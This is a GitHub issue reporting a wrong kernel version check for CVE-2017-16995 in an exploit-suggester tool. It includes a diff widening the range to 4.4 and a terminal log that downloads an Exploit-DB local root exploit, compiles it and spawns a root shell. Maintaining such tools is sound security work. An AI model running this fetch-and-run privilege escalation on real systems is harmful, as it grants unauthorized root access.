[CVE-2017-16995] Incorrect kernel version check

Question

[CVE-2017-16995] Incorrect kernel version check

bcoles opened this issue 6 years ago · 2 comments

It appears the kernel version check for CVE-2017-16995 is incorrect.

As an example, on a vulnerable Linux Mint 18 kernel 4.4.0-116-generic system:

user@mint-18 ~/Desktop/linux-exploit-suggester $ uname -r
4.4.0-116-generic
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
user@mint-18 ~/Desktop/linux-exploit-suggester $ fg
vi linux-exploit-suggester.sh

[1]+  Stopped                 vi linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh
index e9c88d4..cad912c 100755
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -688,7 +688,7 @@ EOF
 
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
-Reqs: pkg=linux-kernel,ver>=4.9,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
+Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
 Tags: ubuntu=16.04.4(kernel:4.4.0-116)
 analysis-url: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
[+] [CVE-2017-16995] eBPF_verifier
   Details: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor

The 4.4.0-116-generic kernel on Ubuntu and Linux Mint is confirmed vulnerable to the exploit:

user@mint-18 ~/Desktop/linux-exploit-suggester $ wget 'https://www.exploit-db.com/download/44298'
--2018-03-25 15:32:03--  https://www.exploit-db.com/download/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/txt]
Saving to: '44298’

44298                           100%[=====================================================>]   5.88K  --.-KB/s    in 0s      

2018-03-25 15:32:04 (1.06 GB/s) - '44298’ saved [6021/6021]

user@mint-18 ~/Desktop/linux-exploit-suggester $ mv 44298 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ gcc 44298.c 
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./a.out 
task_struct = ffff880036c23800
uidptr = ffff880038381c04
spawning root shell
mint-18 linux-exploit-suggester # id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),130(sambashare),1000(user)

It seems there some confusion over the CVEs. For example, the following sources provide conflicting information on the affected kernels:

Regardless, the specified exploit works on the 4.4 kernel.

mzet- commented 6 years ago

Thanks.

Answer 1 · 2018-04-02T06:09:31.000Z

Appears the bug was backported to 4.4 kernel:

https://twitter.com/vnik5287/status/974277953394651137